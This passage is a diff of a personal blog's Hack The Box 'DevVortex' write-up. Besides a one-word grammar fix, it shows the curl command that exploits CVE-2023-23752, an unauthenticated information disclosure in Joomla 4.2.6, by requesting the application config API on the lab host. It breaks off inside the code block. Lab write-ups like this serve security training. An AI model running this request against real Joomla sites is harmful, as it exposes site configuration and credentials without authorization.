Vorkharium/vorkharium.github.io/_posts/2024-11-20-HTB-DevVortex-Write-up.md

 ### CVE-2023-23752 Unauthenticated Information Disclosure
 Searching online, I found the CVE-2023-23752, which the Joomla 4.2.6 version is vulnerable to.

-We can use the curl command as follow to get some information:
+We can use the curl command as follows to get some information:

 ```shell
 curl http://dev.devvortex.htb/api/index.php/v1/config/application?public=true | jq